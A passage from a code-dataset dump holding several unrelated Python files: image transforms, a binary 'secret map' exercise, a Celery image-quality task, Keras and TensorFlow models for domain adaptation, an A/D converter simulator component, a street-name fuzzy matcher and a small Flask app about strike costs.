image.shape[1]-1 - rois[:, [3,1]]\n\n return {'image': image, 'ROI': rois}\n#_______________________________________________________________________________\n\n# ------------------------------------------------------------------------------\n# Randomized Image Vertical Flip\n# ------------------------------------------------------------------------------\nclass RandomVerticalFlip(object):\n \"\"\"Flip input image vertically at random with a probability of 0.5\"\"\"\n\n # --------------------------------------------------------------------------\n def __call__(self, inputs):\n \"\"\"Random image flip along X axis\"\"\"\n image = inputs['image']\n rois = inputs['ROI']\n \n if np.random.random_sample() > 0.5:\n # Flip if the sample drawn is larger than 0.5 in a uniform \n # distribution range of [0. 1.)\n image = np.flipud(image).copy()\n \n # Convert ROI coordinates:\n rois[:, [0,2]] = image.shape[0]-1 - rois[:, [2,0]]\n\n return {'image': image, 'ROI': rois}\n#_______________________________________________________________________________\n\n# ------------------------------------------------------------------------------\n# Randomized Image Horizontal Flip\n# ------------------------------------------------------------------------------\nclass JitterColor(object):\n \"\"\"Wrapper around ColorJitter to handle target transformation\"\"\"\n\n # --------------------------------------------------------------------------\n def __init__(self, brightness=0, contrast=0, saturation=0, hue=0):\n self.tform = ColorJitter(brightness=brightness,\n contrast=contrast,\n saturation=saturation,\n hue=hue)\n \n def __call__(self, inputs):\n \"\"\"Calls colorjitter transform, np-op on targets\"\"\"\n image = inputs['image']\n rois = inputs['ROI']\n image = self.tform.__call__(Image.fromarray(image))\n image = np.array(image)\n \n return {'image': image, 'ROI': rois}\n#_______________________________________________________________________________\n\n# ------------------------------------------------------------------------------\n# Converts sample image and bounding boxes to tensors.\n# ------------------------------------------------------------------------------\nclass ToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n \n # --------------------------------------------------------------------------\n def __init__(self, device='cpu'):\n self.device = device\n\n # --------------------------------------------------------------------------\n def __call__(self, inputs):\n # swap color axis because\n # numpy image: H x W x C\n # torch image: C X H X W\n image = inputs['image']\n image = torch.from_numpy(image).to(self.device)\n image = image.permute((2, 0, 1))\n rois = inputs['ROI']\n rois = torch.from_numpy(rois).to(self.device)\n \n return {'image': image, 'ROI': rois}\n#_______________________________________________________________________________\n\n# ------------------------------------------------------------------------------\n# Normalize image to unit normal intensities\n# ------------------------------------------------------------------------------\nclass NormalizeIntensity(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n \n # --------------------------------------------------------------------------\n def __init__(self, mean, std):\n self.Mean = mean\n self.Std = std\n\n # --------------------------------------------------------------------------\n def __call__(self, inputs):\n # Normalize to zero-mean normal intensities:\n image = inputs['image'].float()\n rois = inputs['ROI']\n for n in range(image.size(0)):\n image[n,:,:] = (image[n,:,:] - self.Mean) / self.Std\n \n return {'image': image, 'ROI': rois}\n#_______________________________________________________________________________\n","sub_path":"model/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":9596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"157412820","text":"def solution(n, arr1, arr2):\n answer = []\n\n for i in range(n):\n # 2진수로 변환하는 방법, str로 처리됨\n arr1[i] = format(arr1[i], 'b')\n arr2[i] = format(arr2[i], 'b')\n\n # 변환된 2진수가 n의 길이보다 짧을경우에는 0으로 채워준다\n arr1[i] = ('0' * (n - len(arr1[i]))) + arr1[i]\n arr2[i] = ('0' * (n - len(arr2[i]))) + arr2[i]\n\n pattern = \"\"\n\n for j in range(n): # 이렇게 해줘야 str내 숫자를 1개씩 가져옴 ex) arr1[0]: 01001 / arr1[0][0]: 01001 중 0을 가져옴\n if arr1[i][j] == '1' or arr2[i][j] == '1':\n pattern += '#'\n\n else:\n pattern += ' '\n\n answer.append(pattern)\n return answer","sub_path":"JE/9주차/SecretMap.py","file_name":"SecretMap.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"543279530","text":"from __future__ import absolute_import\n\nimport os\nimport tempfile\n\nfrom celery import shared_task\nfrom PIL import Image as PILImage\n\nfrom betty.conf.app import settings\n\nfrom .dssim import detect_optimal_quality\ntry:\n import numpy\n import scipy\n IMGMIN_DISABLED = False\nexcept ImportError:\n IMGMIN_DISABLED = True\n\n\ndef is_optimized(image):\n \"\"\"Checks if the image is already optimized\n\n For our purposes, we check to see if the existing file will be smaller than\n a version saved at the default quality (80).\"\"\"\n\n im = PILImage.open(image.source.path)\n icc_profile = im.info.get(\"icc_profile\")\n\n # First, let's check to make sure that this image isn't already an optimized JPEG\n if im.format == \"JPEG\":\n fd, optimized_path = tempfile.mkstemp()\n im.save(\n optimized_path,\n format=\"JPEG\",\n quality=settings.BETTY_DEFAULT_JPEG_QUALITY,\n icc_profile=icc_profile,\n optimize=True)\n os.close(fd)\n if os.stat(image.source.path).st_size < os.stat(optimized_path).st_size:\n # Looks like the original was already compressed, let's bail.\n return True\n\n return False\n\n\n@shared_task\ndef search_image_quality(image_id):\n if IMGMIN_DISABLED:\n return\n\n from betty.cropper.models import Image\n\n image = Image.objects.get(id=image_id)\n\n if is_optimized(image):\n # If the image is already optimized, let's leave this alone...\n return\n\n image.jpeg_quality_settings = {}\n last_width = 0\n for width in sorted(settings.BETTY_WIDTHS, reverse=True):\n\n if abs(last_width - width) < 100:\n # Sometimes the widths are really too close. We only need to check every 100 px\n continue\n\n if width > 0:\n quality = detect_optimal_quality(image.optimized.path, width)\n image.jpeg_quality_settings[width] = quality\n\n if quality == settings.BETTY_JPEG_QUALITY_RANGE[-1]:\n # We'are already at max...\n break\n\n last_width = width\n\n image.clear_crops()\n image.save()\n","sub_path":"betty/cropper/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"474398029","text":"from keras.applications import ResNet50\nfrom keras.models import Model\nimport keras.backend as K\nfrom keras.layers import (Conv2D, LeakyReLU, Input, BatchNormalization, Add,\n MaxPooling2D, Lambda, concatenate, Conv3D, Dropout,\n Activation, Flatten, Dense, GlobalAveragePooling2D)\nfrom keras.regularizers import l1_l2\n\nfrom .neural_layers import residual_block, bilinear_resize, expand_dims, residual_stage\n\ndef create_network(input_shape, prior, L1=0, L2=0, dropout=0, KERNEL_NUM=64):\n inp = Input(shape=input_shape)\n\n x = Conv2D(KERNEL_NUM, 5, padding='same', kernel_regularizer=l1_l2(l1=L1, l2=L2))(inp)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n\n x = Conv2D(2*KERNEL_NUM, 5, padding='same', kernel_regularizer=l1_l2(l1=L1, l2=L2))(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n\n x = Conv2D(4*KERNEL_NUM, 5, padding='same', kernel_regularizer=l1_l2(l1=L1, l2=L2))(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n\n x = Conv2D(8*KERNEL_NUM, 3, padding='same', kernel_regularizer=l1_l2(l1=L1, l2=L2))(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n\n x = Conv2D(16*KERNEL_NUM, 3, padding='same', kernel_regularizer=l1_l2(l1=L1, l2=L2))(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n\n x = Conv2D(KERNEL_NUM, 28, strides=28, kernel_regularizer=l1_l2(l1=L1, l2=L2))(x)\n x = BatchNormalization()(x)\n x = LeakyReLU()(x)\n\n x = Conv2D(8, 1, activation='sigmoid', kernel_regularizer=l1_l2(l1=L1, l2=L2))(x)\n return Model(inp, x)\n","sub_path":"Models/no_reduction_no_prior.py","file_name":"no_reduction_no_prior.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"563295470","text":"# -*- coding: utf-8 -*-\n\nfrom color import Color\nfrom component import Component\nfrom componenttypes import TYPE_SIM_DISCRETE, SIM_INIT, SIM_UPDATE\nfrom lib.pseqt import * # @UnusedWildImport\nfrom terminal import TERM\n\n\nclass Adc(Component):\n '''!\n @if English\n\n Unipolar or bipolar A/D Convertor.\n\n @endif\n\n @if Slovak\n\n Unipolarny / bipolarny analogovo-digitalny prevodnik s nastavitelnym\n rozlisenim.\n\n @endif\n '''\n\n def __init__(self, name, pos):\n Component.__init__(self, name, pos)\n\n self.compType = TYPE_SIM_DISCRETE\n self.shapeImage = 'adc.svg'\n self.box = QRectF(-30, -30, 60, 60)\n self.shapeColor = Color.black\n\n self.addParameter('Vref H', 1, False, QPointF(40, 30), Color.black, True)\n self.addParameter('Vref L', -1, False, QPointF(40, 30), Color.black, True)\n self.addParameter('Resolution', 6, False, QPointF(40, 30), Color.black, True)\n\n self.addTerminal('IN', 1, TERM.IN, QPointF(-30, 0), TERM.DIR_EAST, TERM.IN_ARROW_SMALL_FILL, TERM.IN_ARROW_SMALL)\n self.addTerminal('OUT', 2, TERM.OUT, QPointF(30, 0), TERM.DIR_EAST, TERM.OUT_ARROW_SMALL_FILL, TERM.OUT_ARROW_SMALL)\n\n term = self.addTerminal('CLOCK', 3, TERM.IN, QPointF(0, -25), TERM.DIR_SOUTH, TERM.OUT_ARROW_SMALL_FILL, TERM.OUT_ARROW_SMALL)\n term.termDiscColor = Color.red\n term.termConnColor = Color.red\n term.termConnFill = Color.red\n\n self.bit = 1.0\n\n def updateShape(self):\n super(Adc, self).updateShape()\n\n # kontrola Vh, Vl, rozlisenia\n if self.parameter['Vref H'].value < self.parameter['Vref L'].value:\n self.parameter['Vref H'].value = 1.0\n self.parameter['Vref L'].value = -1.0\n\n if self.parameter['Resolution'].value < 1:\n self.parameter['Resolution'].value = 1\n\n vh = self.parameter['Vref H'].value\n vl = self.parameter['Vref L'].value\n nb = self.parameter['Resolution'].value\n\n self.bit = (vh - vl) / float(pow(2, nb))\n\n def drawShape(self, gc):\n gc.setPen(QPen(self.shapeColor, 0.6))\n grad = QLinearGradient(0, -25, 0, 50)\n grad.setColorAt(0, Color.white)\n grad.setColorAt(1, Color.khaki)\n gc.setBrush(QBrush(grad))\n gc.drawRoundedRect(-25, -25, 50, 50, 5, 5)\n\n self.drawIcon(gc, -20, -20)\n\n font = QFont('Decorative', 8)\n font.setItalic(True)\n gc.setFont(font)\n gc.setPen(QPen(Color.red, 1))\n gc.drawText(QRectF(-10, -10, 20, 20), Qt.AlignHCenter | Qt.AlignVCenter, str(self.parameter['Resolution'].value))\n\n def sim(self, flag, value, time, step):\n if flag == SIM_INIT:\n self.terminal[2].value = 0\n\n elif flag == SIM_UPDATE:\n # pri externom clocku je hodnota prevedena len v stave clock=1\n # inak v kazdom kroku\n\n if self.terminal[3].value < 1:\n return\n\n vh = self.parameter['Vref H'].value\n vl = self.parameter['Vref L'].value\n #nb = self.parameter['Resolution'].value\n #bit = (vh - vl) / float(pow(2, nb))\n inp = self.terminal[1].value # vstupna analogova hodnota,\n\n # saturacia\n if inp >= vh:\n inp = vh\n\n if inp <= vl:\n inp = vl\n\n out = (inp - vl + self.bit / 2) / self.bit\n self.terminal[2].value = int(out)\n","sub_path":"src/lib/discrete/ad_converter.py","file_name":"ad_converter.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"231562795","text":"import Levenshtein\nimport pickle\nimport io\nimport csv\n\n\ndef loadDictionary(nameDictionary):\n global dictVieVereAllCombinations\n with open(nameDictionary, 'rb') as handle:\n dictVieVereAllCombinations = pickle.load(handle)\n\ndef rapidSearchInDbCiviciTorino(viaDaUtente):\n global maxAbs\n global result\n \"cerca la via fornita dall'utente nel db delle vie di Torino \"\n for k, v in dictVieVereAllCombinations.items():\n maxVToken = 0\n # print(k)\n # if(k == \"VIA VINCENZO GIOBERTI\"):\n # print()\n for token in v:\n\n strConcatenata = \"\"\n strConcatenata = strConcatenata.join(elem for elem in token)\n value = Levenshtein.ratio(strConcatenata, str)\n if (value > maxVToken):\n maxVToken = value\n\n if (maxVToken > maxAbs):\n maxAbs = maxVToken\n result = k\n #print(f'{k},{maxVToken}')\n return;\n\ndef searchInDbCiviciTorino(viaDaUtente):\n tokenDaViaDaUtente = viaDaUtente.split()\n lenTokenDaViaDaUtente = len(tokenDaViaDaUtente)\n viaNoSpace = viaDaUtente.replace(\" \", \"\")\n global maxAbs\n global result\n \"cerca la via fornita dall'utente nel db delle vie di Torino \"\n for k, v in dictVieVereAllCombinations.items():\n maxVToken = 0\n # print(k)\n if(k == \"VIA GIOVANNI SEGANTINI\"):\n print()\n for token in v:\n lenToken = len(token) # quanti token ci sono nel compione per il confronto\n if(maxVToken != 1):\n if(lenTokenDaViaDaUtente == lenToken):\n strConcatenata = \"\"\n strConcatenata = strConcatenata.join(elem for elem in token)\n\n value = Levenshtein.ratio(strConcatenata, viaNoSpace)\n if (value > maxVToken):\n maxVToken = value\n\n if (maxVToken > maxAbs):\n maxAbs = maxVToken\n result = k\n #print(f'{k},{maxVToken}')\n return;\n\n#carico il dictionary con dentro i dati Key:Value ---- Via : lista(tutte le possibili permutazioni delle parole che compongno la via)\nloadDictionary('filename.pickle')\n\n\nstr = \"CORSO TOSCANA 16\"\n\nitemsParole = str.split()\n\n\n#definisco le variabili per trovare il valore di similaruta' massima e il rseult\nmaxAbs = 0 #value della similarità massima\nresult = \"\" #la via che cerco\n\nsearchInDbCiviciTorino(str) #chiamo la funzione per cercare in tutte la via in tutte le vie del db\nprint(\"result: \"+result)\nprint(maxAbs)\nmaxAbs=0\nrapidSearchInDbCiviciTorino(str)\n\nprint(f'original {str}-------> {result},{maxAbs}')\n\n\n#print(\"lunghezza db: \"+len(dictVieVereAllCombinations))\n\n\n\n'''for val in reader:\n value = Levenshtein.ratio(val[0], \"VIA GIOBERTI\")\n print(val[0] + \",\" + str(value))\n # print(value)\n if value > maxv:\n maxv = value\n correct = val[0]\n'''\n","sub_path":"LevenshteinSimilarityTest1Func.py","file_name":"LevenshteinSimilarityTest1Func.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"206571523","text":"#===============================================================================\n# __init__.py\n#===============================================================================\n\n\"\"\"Initialization\n\nThis file contains the application factory for the okscope app.\n\"\"\"\n\n\n\n\n# Imports ======================================================================\n\nimport os\nfrom datetime import datetime\nfrom numpy import busday_count\nfrom flask import Flask, render_template, url_for\n\n\n\n\n# Functions ====================================================================\n\ndef total_spent(\n per_day: int = 300_000,\n cola_year: int = (1412 * 12),\n strike_start: str = '2020-02-10',\n today: str = datetime.today().strftime('%Y-%m-%d'),\n holidays: int = 1,\n total_grads: int = 1977\n):\n days = busday_count(strike_start, today) - holidays\n total = days * per_day\n millions = f'{(total / 1e6):.1f}'\n cola_years = int(round(total / cola_year))\n percent_grads = int(round(cola_years / total_grads * 100))\n return millions, cola_years, total_grads, percent_grads\n\n\ndef create_app(test_config=None):\n \"\"\"The application factory function\n\n This function creates and configures the Flask application object. For\n more on application factories, see the Flask documentation/tutorial:\n\n http://flask.pocoo.org/docs/1.0/tutorial/factory/\n\n http://flask.pocoo.org/docs/1.0/patterns/appfactories/\n\n Parameters\n ----------\n test_config : dict\n A dictionary containing configuration parameters for use during unit\n testing. If this parameter is `None`, the configuration will be loaded\n from `config.py` in the instance folder.\n\n Returns\n -------\n Flask\n A flask app\n \"\"\"\n\n app = Flask(__name__, instance_relative_config=True)\n \n if test_config is None:\n app.config.from_pyfile('config.py', silent=True)\n else:\n app.config.from_mapping(test_config)\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n \n @app.route('/')\n def index():\n millions, cola_years, total_grads, percent_grads = total_spent(\n today=datetime.today().strftime('%Y-%m-%d')\n )\n return render_template(\n 'index.html',\n nav_button=\"About\",\n url=url_for('about'),\n millions=millions,\n cola_years=cola_years,\n total_grads=total_grads,\n percent_grads=percent_grads\n )\n \n @app.route('/about')\n def about():\n return render_template('about.html', nav_button=\"Back\", url=url_for('index'))\n \n return app\n","sub_path":"cola_years/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"434438086","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\ndef shuffle_data(data, label):\n \"\"\"Shuffle permutation of data.\"\"\"\n num = data.shape[0]\n p = np.random.permutation(num)\n return (data[p,:], label[p,:])\n\n\ndef batch_generator(data, label, batch_size, shuffle=True):\n \"\"\"Generate batches of data.\n \n Given a list of array-like objects, generate batches of a given\n size by yielding a list of array-like objects .\n \"\"\"\n \n if shuffle:\n data, label = shuffle_data(data, label)\n\n batch_count = 0\n while True:\n if batch_count * batch_size + batch_size >= data.shape[0]:\n batch_count = 0\n\n if shuffle:\n data, label = shuffle_data(data, label)\n\n start = batch_count * batch_size\n end = start + batch_size\n batch_count += 1\n yield (data[start:end,:], label[start:end,:])\n\n\nclass MCD_DA():\n def __init__(self):\n pass\n\n def weight_variable(self, name, shape):\n initializer = tf.truncated_normal_initializer(mean = 0.0, stddev = 0.01, dtype = tf.float32)\n return tf.get_variable(name, shape, initializer = initializer)\n\n def bias_variable(self, name, shape):\n initializer = tf.constant_initializer(value = 0.0, dtype = tf.float32)\n return tf.get_variable(name, shape, initializer = initializer)\n\n def alpha_variable(self, name):\n initializer = tf.constant_initializer(value = 0.75, dtype = tf.float32)\n return tf.get_variable(name, shape = (), initializer = initializer)\n\n def generator(self, x, filter_size, n_filters_1, n_filters_2, n_filters_3, n_units, keep_prob, reuse = False):\n x_reshaped = tf.reshape(x, [-1, 32, 32, 1])\n\n with tf.variable_scope('generator', reuse = reuse):\n w_1 = self.weight_variable('w_1', [filter_size, filter_size, 1, n_filters_1])\n b_1 = self.bias_variable('b_1', [n_filters_1])\n\n # conv1\n conv1 = tf.nn.conv2d(x_reshaped, w_1, strides = [1, 1, 1, 1], padding = 'SAME') +b_1\n\n # batch norm 1\n batch_mean_1, batch_var_1 = tf.nn.moments(conv1, [0, 1, 2])\n conv1 = (conv1 - batch_mean_1) / (tf.sqrt(batch_var_1) + 1e-5)\n\n # relu\n conv1 = tf.nn.relu(conv1)\n\n # max_pool_1\n conv1 = tf.nn.max_pool(conv1, ksize = [1, 3, 3, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n\n \n w_2 = self.weight_variable('w_2', [filter_size, filter_size, n_filters_1, n_filters_2])\n b_2 = self.bias_variable('b_2', [n_filters_2])\n\n # conv2\n conv2 = tf.nn.conv2d(conv1, w_2, strides = [1, 1, 1, 1], padding = 'SAME') + b_2\n\n # batch norm 2\n batch_mean_2, batch_var_2 = tf.nn.moments(conv2, [0, 1, 2])\n conv2 = (conv2 - batch_mean_2) / (tf.sqrt(batch_var_2) + 1e-5)\n \n # relu 2\n conv2 = tf.nn.relu(conv2)\n \n # max_pool_2\n conv2 = tf.nn.max_pool(conv2, ksize = [1, 3, 3, 1], strides = [1, 2, 2, 1], padding = 'SAME')\n\n w_3 = self.weight_variable('w_3', [filter_size, filter_size, n_filters_2, n_filters_3])\n b_3 = self.bias_variable('b_3', [n_filters_3])\n \n # conv3\n conv3 = tf.nn.conv2d(conv2, w_3, strides = [1, 1, 1, 1], padding = 'SAME') + b_3\n\n # batch norm 3\n batch_mean_3, batch_var_3 = tf.nn.moments(conv3, [0, 1, 2])\n conv3 = (conv3 - batch_mean_3) / (tf.sqrt(batch_var_3) + 1e-5)\n \n # relu 3\n conv3 = tf.nn.relu(conv3)\n\n \n \n # fc 1\n conv_flat = tf.reshape(conv3, [-1, 8 * 8 * n_filters_3]) # 8192=8*8*128\n\n w_4 = self.weight_variable('w_4', [8 * 8 * n_filters_3, n_units])\n b_4 = self.bias_variable('b_4', [n_units])\n \n fc = tf.matmul(conv_flat, w_4) + b_4\n\n # bn1_fc\n batch_mean, batch_var = tf.nn.moments(fc, [0])\n bn1_fc = (fc - batch_mean) / (tf.sqrt(batch_var) + 1e-5)\n\n # relu\n fc = tf.nn.relu(bn1_fc)\n\n # dropout\n fc = tf.nn.dropout(fc, keep_prob)\n \n \n # leaky relu\n #fc = tf.maximum(0.2 * fc, fc)\n \n feature = fc\n return feature\n\n def classifier_1(self, \n x, \n n_units_1, \n n_units_2, \n #keep_prob, \n reuse = False):\n \n with tf.variable_scope('classifier_1', reuse = reuse):\n w_1 = self.weight_variable('w_1', [n_units_1, n_units_2])\n b_1 = self.bias_variable('b_1', [n_units_2])\n \n fc = tf.matmul(x, w_1) + b_1\n\n # batch norm\n batch_mean, batch_var = tf.nn.moments(fc, [0])\n fc = (fc - batch_mean) / (tf.sqrt(batch_var) + 1e-5)\n \n # relu\n fc = tf.nn.relu(fc)\n \n w_2 = self.weight_variable('w_2', [n_units_2, 10])\n b_2 = self.bias_variable('b_2', [10])\n \n fc = tf.matmul(fc, w_2) + b_2\n \n #dropout\n #fc = tf.nn.dropout(fc, keep_prob)\n\n logits = fc\n return logits\n\n def classifier_2(self, \n x, \n n_units_1, \n n_units_2, \n #keep_prob, \n reuse = False):\n \n with tf.variable_scope('classifier_2', reuse = reuse):\n \n w_1 = self.weight_variable('w_1', [n_units_1, n_units_2])\n b_1 = self.bias_variable('b_1', [n_units_2])\n \n fc = tf.matmul(x, w_1) + b_1\n\n # batch norm\n batch_mean, batch_var = tf.nn.moments(fc, [0])\n fc = (fc - batch_mean) / (tf.sqrt(batch_var) + 1e-5)\n \n # relu\n fc = tf.nn.relu(fc)\n \n w_2 = self.weight_variable('w_2', [n_units_2, 10])\n b_2 = self.bias_variable('b_2', [10])\n \n fc = tf.matmul(fc, w_2) + b_2\n \n #dropout\n #fc = tf.nn.dropout(fc, keep_prob)\n\n logits = fc\n return logits\n\n def loss_cross_entropy(self, logits, labels):\n cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels))\n return cross_entropy\n\n def discrepancy(self, probs_1, probs_2):\n return tf.reduce_mean(tf.abs(probs_1 - probs_2)) \n\n def accuracy(self, y, t):\n correct_preds = tf.equal(tf.argmax(y, axis = 1), tf.argmax(t, axis = 1))\n accuracy = tf.reduce_mean(tf.cast(correct_preds, tf.float32))\n return accuracy\n\n def training(self, loss, learning_rate, var_list):\n #optimizer = tf.train.AdamOptimizer(learning_rate = learning_rate)\n #optimizer = tf.train.GradientDescentOptimizer(learning_rate = learning_rate)\n optimizer = tf.train.MomentumOptimizer(learning_rate = learning_rate, momentum = 0.9)\n train_step = optimizer.minimize(loss, var_list = var_list)\n return train_step\n\n def training_clipped(self, loss, learning_rate, clip_norm, var_list):\n optimizer = tf.train.AdamOptimizer(learning_rate = learning_rate)\n\n grads_and_vars = optimizer.compute_gradients(loss, var_list = var_list)\n clipped_grads_and_vars = [(tf.clip_by_norm(grad, clip_norm = clip_norm), \\\n var) for grad, var in grads_and_vars]\n train_step = optimizer.apply_gradients(clipped_grads_and_vars)\n\n return train_step\n\n def train(self, images_train_1, labels_train_1, images_test_1, labels_test_1, \\\n images_train_t, labels_train_t, images_test_t, labels_test_t, \\\n filter_size, n_filters_1, n_filters_2, n_filters_3, n_units_g, n_units_c, \\\n learning_rate, epoch, num_stepC, batch_size, show_step, is_saving, model_path):\n \n tf.reset_default_graph()\n\n x_1 = tf.placeholder(shape = [None, 32 * 32], dtype = tf.float32)\n y_1 = tf.placeholder(shape = [None, 10], dtype = tf.float32)\n x_t = tf.placeholder(shape = [None, 32 * 32], dtype = tf.float32)\n y_t = tf.placeholder(shape = [None, 10], dtype = tf.float32)\n keep_prob = tf.placeholder(shape = (), dtype = tf.float32)\n\n feat_1 = self.generator(x_1, filter_size, n_filters_1, n_filters_2, n_filters_3, n_units_g, \\\n keep_prob, reuse = False)\n feat_t = self.generator(x_t, filter_size, n_filters_1, n_filters_2, n_filters_3, n_units_g, \\\n keep_prob, reuse = True)\n\n logits_1_1 = self.classifier_1(feat_1, n_units_g, n_units_c, reuse = False)\n probs_1_1 = tf.nn.softmax(logits_1_1)\n loss_1_1 = self.loss_cross_entropy(logits_1_1, y_1)\n\n logits_1_t = self.classifier_1(feat_t, n_units_g, n_units_c, reuse = True)\n probs_1_t = tf.nn.softmax(logits_1_t)\n loss_1_t = self.loss_cross_entropy(logits_1_t, y_t)\n\n logits_2_1 = self.classifier_2(feat_1, n_units_g, n_units_c, reuse = False)\n probs_2_1 = tf.nn.softmax(logits_2_1)\n loss_2_1 = self.loss_cross_entropy(logits_2_1, y_1)\n\n logits_2_t = self.classifier_2(feat_t, n_units_g, n_units_c, reuse = True)\n probs_2_t = tf.nn.softmax(logits_2_t)\n loss_2_t = self.loss_cross_entropy(logits_2_t, y_t)\n\n loss_a = loss_1_1 + loss_2_1\n #loss_b = - self.discrepancy(probs_1_t, probs_2_t)\n loss_b = loss_a - self.discrepancy(probs_1_t, probs_2_t)\n loss_c = self.discrepancy(probs_1_t, probs_2_t)\n\n var_list_g = tf.trainable_variables('generator')\n var_list_c_1 = tf.trainable_variables('classifier_1')\n var_list_c_2 = tf.trainable_variables('classifier_2')\n\n var_list_a = var_list_g + var_list_c_1 + var_list_c_2\n var_list_b = var_list_c_1 + var_list_c_2\n var_list_c = var_list_g\n\n # Without Gradient Clipping\n train_step_a = self.training(loss_a, learning_rate, var_list_a)\n train_step_b = self.training(loss_b, learning_rate, var_list_b)\n train_step_c = self.training(loss_c, learning_rate, var_list_c)\n\n acc_1_1 = self.accuracy(probs_1_1, y_1)\n acc_1_t = self.accuracy(probs_1_t, y_t)\n acc_2_1 = self.accuracy(probs_2_1, y_1)\n acc_2_t = self.accuracy(probs_2_t, y_t)\n\n init = tf.global_variables_initializer()\n saver = tf.train.Saver()\n\n with tf.Session() as sess:\n sess.run(init)\n\n history_loss_train_1_1 = []\n history_loss_train_1_t = []\n history_loss_train_2_1 = []\n history_loss_train_2_t = []\n\n history_loss_test_1_1 = []\n history_loss_test_1_t = []\n history_loss_test_2_1 = []\n history_loss_test_2_t = []\n\n history_acc_train_1_1 = []\n history_acc_train_1_t = []\n history_acc_train_2_1 = []\n history_acc_train_2_t = []\n\n history_acc_test_1_1 = []\n history_acc_test_1_t = []\n history_acc_test_2_1 = []\n history_acc_test_2_t = []\n\n history_loss_train_a = []\n history_loss_train_b = []\n history_loss_train_c = []\n\n history_loss_test_a = []\n history_loss_test_b = []\n history_loss_test_c = []\n \n get_source_batch = batch_generator(images_train_1, labels_train_1, batch_size, shuffle=True)\n get_target_batch = batch_generator(images_train_t, labels_train_t, batch_size, shuffle=True)\n \n test_source_batch = batch_generator(images_test_1, labels_test_1, batch_size, shuffle=False)\n test_target_batch = batch_generator(images_test_t, labels_test_t, batch_size, shuffle=False)\n \n \n #n_iter = images_train_1.shape[0]//batch_size\n n_iter = images_train_t.shape[0]//batch_size\n print('number of batches for training: {}'.format(n_iter))\n \n iter_total = -1\n best_acc_classifier1 = 0\n best_acc_classifier2 = 0\n show_numbers = 0\n #cur_model_name = 'MCD_net_{}'.format(int(time.time()))\n \n # variables for plot\n source_acc_train1 = []\n source_acc_train2 = []\n target_acc_train1 = []\n target_acc_train2 = []\n \n source_acc_test1 = []\n source_acc_test2 = []\n target_acc_test1 = []\n target_acc_test2 = []\n \n for epc in range(epoch):\n print(\"epoch {} \".format(epc + 1))\n\n for i in range(n_iter):\n iter_total += 1\n \n x_train_batch, y_train_batch = next(get_source_batch)\n x_target_batch, y_target_batch = next(get_target_batch)\n \n # Train\n # Step A\n feed_A_dict = {x_1: x_train_batch, y_1: y_train_batch, keep_prob: 0.5} #0.8\n sess.run(train_step_a, feed_dict = feed_A_dict)\n\n # Step B\n feed_B_dict = {x_1: x_train_batch, y_1: y_train_batch, x_t: x_target_batch, keep_prob: 0.5} #0.8\n sess.run(train_step_b, feed_dict = feed_B_dict)\n\n # Step C\n for n_c in range(num_stepC):\n feed_C_dict = {x_t: x_target_batch, keep_prob: 0.5} #0.75\n sess.run(train_step_c, feed_dict = feed_C_dict) \n \n\n # Checking\n \"\"\"\n # Train data\n rand_index = np.random.choice(len(images_train_1), size = batch_size)\n x_batch_1 = images_train_1[rand_index]\n y_batch_1 = labels_train_1[rand_index]\n\n rand_index = np.random.choice(len(images_train_t), size = batch_size)\n x_batch_t = images_train_t[rand_index]\n y_batch_t = labels_train_t[rand_index]\n\n feed_dict = {x_1: x_batch_1, y_1: y_batch_1, x_t: x_batch_t, y_t: y_batch_t, keep_prob: 0.8} #0.8\n\n temp_loss_train_1_1 = sess.run(loss_1_1, feed_dict = feed_dict)\n temp_loss_train_1_t = sess.run(loss_1_t, feed_dict = feed_dict)\n temp_loss_train_2_1 = sess.run(loss_2_1, feed_dict = feed_dict)\n temp_loss_train_2_t = sess.run(loss_2_t, feed_dict = feed_dict)\n\n temp_acc_train_1_1 = sess.run(acc_1_1, feed_dict = feed_dict)\n temp_acc_train_1_t = sess.run(acc_1_t, feed_dict = feed_dict)\n temp_acc_train_2_1 = sess.run(acc_2_1, feed_dict = feed_dict)\n temp_acc_train_2_t = sess.run(acc_2_t, feed_dict = feed_dict)\n\n history_loss_train_1_1.append(temp_loss_train_1_1)\n history_loss_train_1_t.append(temp_loss_train_1_t)\n history_loss_train_2_1.append(temp_loss_train_2_1)\n history_loss_train_2_t.append(temp_loss_train_2_t)\n\n history_acc_train_1_1.append(temp_acc_train_1_1)\n history_acc_train_1_t.append(temp_acc_train_1_t)\n history_acc_train_2_1.append(temp_acc_train_2_1)\n history_acc_train_2_t.append(temp_acc_train_2_t)\n\n temp_loss_train_a = sess.run(loss_a, feed_dict = feed_dict)\n temp_loss_train_b = sess.run(loss_b, feed_dict = feed_dict)\n temp_loss_train_c = sess.run(loss_c, feed_dict = feed_dict)\n\n history_loss_train_a.append(temp_loss_train_a)\n 